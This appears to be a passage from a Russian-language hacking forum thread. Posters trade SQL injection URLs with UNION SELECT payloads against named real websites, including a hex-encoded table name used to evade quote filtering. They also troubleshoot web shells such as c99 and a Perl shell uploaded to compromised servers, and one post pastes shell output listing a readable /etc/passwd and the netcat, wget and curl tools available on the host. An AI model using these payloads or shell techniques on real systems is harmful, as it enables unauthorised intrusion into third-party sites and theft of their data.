не угaдал...он все правильно туда ставил и ось там была *никс...просто сайт раньше ломали и админ кое что в настройках сервера подправил...но хитрым способом это можно было обойти и в итоге шелл был залит.
Народ, подскажите это PHP-inj или фрейм http://www.prodisney.ru/index.php?page=index.php и если это фрейм то что должно было быть при PHP-inj?
Смотрим сурс: Code: <frame src="index.php" name="right_frameset" frameborder="No"> Фрейм - страница вставлена во фрейм Читалка - видешь сурс страница, в т.ч. и PHP. PHP-inject - это include('page.php'); PHP выучи хотябы а потом уже хацкери =\\
Не получается вывести версию БД. http://www.vyo.org/index.php?events/action/show/id/event/yr/2010/mon/-12+union+select+1,2,version(),4,5,6,7,8,9+--+
version: 5.0.54-log user: [email protected] database: dbvyoa писать в личку и дальше спрашивать как я получил это не следует..Я УГАДАЛ !!! ЗЫ. Вопросы по раскрутке уже задолбали
http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5 ,6,column_name,8,9,10,11 FROM INFORMATION_SCHEMA.columns where table_name='USER_PRIVILEGES' -- как будет правильно составить запрос?
toX1k могически_кавычке = on хекс юзай и почитай маны http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5,6,column_name,8,9,10,11+FROM+INFORMATION_SCHEMA.columns+where+table_name=0x555345525F50524956494C45474553-- P.S. пробелы убери
я так и подумал что кавычки фильтруются ('), аналога заменяющего их не нашёл сначала char() хотел заюзать, после передумал
Залей другой шелл, видимо в настройках пхп на сервере отключена/неработает функция получения списка файлов в каталоге или приведи код шелла здесь
Короче в связи с тем что ты очень мало даешь информации, остается только вариант угадать что у тебя случилось, если представить что на том сервере стоит BSD система, то естественно работать не будет, потому что c99 работает с realpath() которая не совместима с БСД системами. А вообще можно залить шелл например написанный на perl
Server software: Apache/2.2 Loaded Apache modules: core, itk, http_core, mod_so, mod_auth_basic, mod_authn_file, mod_authz_host, mod_authz_user, mod_authz_groupfile, mod_authz_default, mod_include, mod_log_config, mod_env, mod_expires, mod_headers, mod_setenvif, mod_mime, mod_status, mod_autoindex, mod_negotiation, mod_dir, mod_alias, mod_rewrite, mod_actions, mod_unique_id, mod_auth_mysql, mod_deflate, mod_nogzip, mod_rpaf-2, mod_php5 Disabled PHP Functions: leak,posix_getpwuid,posix_getpwnam,posix_getgrid,posix_getgrnam,posix_getgroups cURL support: enabled Supported databases: MySql (5.0.77), MSSQL, PostgreSQL Readable /etc/passwd: yes [view] Readable /etc/shadow: no OS version: Linux version 2.6.32.21-grsec-6.mosso5.x86_64 ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Thu Oct 14 13:22:47 CDT 2010 Distr name: Red Hat Enterprise Linux Server release 5.5 (Tikanga) Kernel \r on an \m Userful: gcc, cc, ld, make, php, tar, gzip, bzip2, nc, locate Danger: iptables Downloaders: wget, curl
А другие варианты есть какие-либо кроме perl шелла кстати через console - > list dir Отображает файлы и папки
попробуй print_r(scandir('полный_путь_до_каталога')); если выведет список дир, тогда переделывать шелл придется, или найти тот который использует scandir
